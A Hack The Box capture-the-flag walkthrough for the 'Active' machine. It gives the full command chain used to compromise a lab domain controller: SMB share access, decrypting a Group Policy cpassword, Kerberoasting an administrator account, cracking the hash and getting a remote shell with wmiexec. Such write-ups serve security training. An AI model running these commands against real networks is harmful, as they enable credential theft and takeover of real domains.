twitter

Hack The Box: Active

Difficulty: Medium

 

Machine Creator: eks & mrb3n

 

Tools Used:

 

NMAP

SMBCLIENT

gpp-decrypt

smbmap

ldapsearch

GetUserSPN.py

Hashcat

wmiexec.py

Task: To find User.txt and Root.txt

 

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.100

The nmap scan shows us some impressive results. We can see port 53 Microsoft DNS, port 88 Kerberos, and port 389,3268 LDAP. From all these ports we can expect this server to be a domain controller for the domain active.htb.

 

SMB

SMB port 445 is also on this box lets see if we can access any open shares.

smbclient -L //10.10.10.100

smbclient //10.10.10.100/Replication


After some trial and error, I was able to access the Replication directory which is a domain share.


After going through the shares from the domain controller, we can see the directory “Policies” this share holds all the group policies. In this directory, there is Groups.xml file this file can contain some vital information.

Group Policy


The groups.xml file is used in older versions of windows to modify accounts via group policy. In this file, we can see this will update the user active.htb\SVC_TGS and will change the password. The cpassword is an encrypted version of the password.

CPASSWORD

https://msdn.microsoft.com/en-us/library/cc422924.aspx


The vulnerability in the cpassword is the encryption key that is well known, and Microsoft has never changed the key — using the tool gpp-decrypt.

SMBMAP

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100

With user credential,s we can run smbmap to see what access we have to shares.

LDAPSEARCH

ldapsearch -x -h 10.10.10.100 -p 389 -D ‘SVC_TGS’ -w ‘GPPstillStandingStrong2k18’ -b “dc=active,dc=htb” -s sub”(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.1 13556.1.4.803:=2))(serviceprincipalname=*/*))” serviceprincipalname | grep -B 1 servicePrincipalName


With LDAPsearch we can find any users that have a Service Principal Name (SPN)

GetUserSPNs.py

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

https://github.com/SecureAuthCorp/impacket/tree/master/impacket

python GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request

The GetUserSPNs.py from impacket allows us to get the hash for the administrator user. Now we need to crack this hash.

Hashcat

hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt

With the hash we got in the previous step I put the hash in a text file so we can run it through hashcat. In this instance, I am using the windows version so I can take advantage of my Nvidia 1060 graphics card. Your command will vary depending on your setup. After a couple of seconds, the hash is cracked to reveal the password “Ticketmaster1968.”

wmiexec.py

python wmiexec.py active.htb/administrator:[email protected]

We have the user credentials for Administrator however this server does not have RDP enabled. In the impacket directory, there is a python file called wmiexec.py, this will allow us to create a terminal session over wmi.

User.txt/Root.txt